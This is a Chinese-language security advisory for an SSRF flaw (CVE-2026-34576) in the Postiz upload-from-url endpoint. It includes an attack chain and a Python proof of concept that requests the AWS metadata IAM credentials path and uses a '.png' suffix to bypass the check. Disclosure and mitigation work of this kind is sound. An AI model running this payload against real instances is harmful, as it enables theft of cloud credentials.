CVE-2026-34576 CVSS 7.7 高危

CVE-2026-34576 Postiz SSRF漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34576

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Postiz

漏洞概述

Postiz是一款AI社交媒体调度工具。在2.21.3版本之前，其`/public/v1/upload-from-url`接口存在服务器端请求伪造（SSRF）漏洞。由于仅对URL进行了简单的文件扩展名校验且缺乏SSRF防护机制，经过身份认证的攻击者可通过构造恶意URL绕过限制，诱导服务器端请求内部网络资源或云元数据，并获取响应内容。

技术细节

该漏洞位于Postiz的`POST /public/v1/upload-from-url`接口中。应用程序使用`axios.get()`方法获取用户提供的URL内容，但未实施任何SSRF防护措施（如IP地址黑名单或内网IP过滤）。系统仅通过检查URL路径中是否包含图片扩展名（如.png, .jpg）来进行验证。攻击者可以通过在恶意URL末尾追加合法的图片后缀（例如`http://169.254.169.254/latest/meta-data/iam/security-credentials/.png`）轻松绕过此检查。服务器端解析请求后，会向目标地址发起请求，将获取的内部敏感数据上传至存储，并返回给攻击者，从而导致信息泄露。

攻击链分析

STEP 1

步骤1：获取认证

攻击者注册或使用现有账号登录Postiz，获取合法的API访问凭证（因为漏洞需要低权限认证）。

STEP 2

步骤2：构造恶意URL

攻击者构造指向内部敏感资源（如云元数据服务169.254.169.254）的URL，并在末尾添加允许的图片后缀（如.png）以绕过前端校验。

STEP 3

步骤3：发送SSRF请求

攻击者向`/public/v1/upload-from-url`端点发送POST请求，其中包含构造好的恶意URL。

STEP 4

步骤4：服务端请求与回显

服务器端接收请求，通过扩展名校验，使用axios向内网地址发起请求，并将获取到的敏感数据上传至存储后返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "https://target-postiz-instance.com/public/v1/upload-from-url"

# Payload: AWS metadata endpoint with image extension bypass
# Internal metadata endpoint: http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Bypass technique: appending ".png"
payload = {
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/role.png"
}

# Send the POST request (Authentication token might be required based on PR:L)
headers = {
    "Authorization": "Bearer <VALID_TOKEN>",
    "Content-Type": "application/json"
}

response = requests.post(target_url, json=payload, headers=headers)

# Check if the internal resource was fetched
if response.status_code == 200:
    print("SSRF Successful! Response data:")
    print(response.json())
else:
    print("Failed to exploit")

影响范围

Postiz < 2.21.3

防御指南

临时缓解措施

建议立即将Postiz应用升级至2.21.3及以上版本。如无法立即升级，应在网络防火墙层面阻断服务器对RFC 1918定义的内网地址及链路本地地址（如169.254.0.0/16）的访问，或暂时禁用受影响的API接口功能。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表